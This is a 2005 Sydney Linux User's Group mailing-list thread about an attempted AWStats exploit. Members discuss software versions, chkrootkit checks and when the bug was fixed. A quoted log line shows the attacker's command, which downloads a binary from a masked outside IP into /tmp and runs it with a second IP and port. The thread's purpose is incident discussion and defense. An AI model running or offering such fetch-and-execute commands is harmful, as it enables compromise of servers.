On Sun, 22 May 2005 13:04, Rob Sharp wrote: > On Sun, 2005-05-22 at 12:25 +0930, Ryan Verner wrote: > > On Sun, 2005-05-22 at 12:49 +1000, Rob Sharp wrote: > > > Ouch! They'd tried to run: > > > > > > cd /tmp;rm -f /tmp/c;wget 128.xxx.xxx.xxx/c;chmod +x c;./c > > > 80.xxx.xxx.xxx 80 > > > > > > Voytek, how did you notice you'd been exploited? > > > > How old is the AWStats that you are running? I thought these remote > > exploit bugs were squashed ages ago. > > > > R > > Advanced Web Statistics 6.4 (build 1.810), which I think is the latest. > I'm pretty sure the exploit failed, chkrootkit came back with nothing, > and nothing unusual is running. I'm probably just being a bit > paranoid... > > Cheers, > Rob.
Spoke with the admin guys at work, this bug was "introduced" in 6.1, and is AFAIK fixed in 6.3, definitely in 6.4. -- --- Marek Wawrzyczny ------------------------------------- "Terrorism is the war of the poor, and, war is terrorism of the rich." - Peter Ustinov ------------------------------------- - -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
